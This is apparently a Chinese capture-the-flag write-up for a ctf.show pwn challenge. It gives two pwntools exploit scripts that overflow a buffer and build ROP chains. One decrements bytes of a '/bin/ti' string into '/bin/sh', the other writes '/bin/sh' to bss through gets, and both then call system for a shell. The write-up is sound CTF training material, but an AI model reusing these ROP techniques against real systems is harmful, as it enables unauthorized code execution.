0x00 第一种方法
查找字符串发现了可疑的/bin/ti
ROPgadget --binary pwn --string "ti"
获得ti的位置:
Strings information ============================================================ 0x000000000060104d : ti
有可以利用的函数look_here,让其ascii-1:
_BYTE *__fastcall look_here(_BYTE *a1) { _BYTE *result; // rax int i; // [rsp+14h] [rbp-4h] for ( i = 0; i <= 1; ++i ) { result = a1; --*a1++; } return result; }
exp,结尾需要平衡栈:
from pwn import * from LibcSearcher import * elf = ELF('./pwn') local = 1 if local == 1: io = process('./pwn') else: io = remote('pwn.challenge.ctf.show',28133) system_addr = elf.symbols['system'] pop_rdi_ret = 0x0000000000400733 ti = 0x000000000060104d binsh = 0x601048 lookhere = 0x40062D ret = 0x00000000004004d1 payload = 'a'*0x2A0+p64(0xdeadbeef)+p64(pop_rdi_ret)+p64(ti)+p64(lookhere)+p64(pop_rdi_ret)+p64(binsh)+p64(ret)+p64(system_addr) io.sendline(payload) io.interactive()
0x01 第二种方法
不需要使用函数look_here,因为题中给了get函数,利用它写一个“/bin/sh”即可。
需要把“/bin/sh”写入bss段中:
from pwn import * from LibcSearcher import * elf = ELF('./pwn') local = 0 if local == 1: io = process('./pwn') #gdb.attach(io,'b * 0x04006B2') else: io = remote('pwn.challenge.ctf.show',28133) system_addr = elf.symbols['system'] gets_addr = elf.symbols['gets'] bss = 0x00601800 binsh = 0x601048 ret = 0x00000000004004d1 pop_rdi_ret = 0x0000000000400733 payload = 'a'*0x2A0+p64(0xdeadbeef)+p64(pop_rdi_ret)+p64(bss)+p64(gets_addr)+p64(pop_rdi_ret)+p64(bss)+p64(ret)+p64(system_addr) io.sendline(payload) io.sendline('/bin/sh') io.interactive()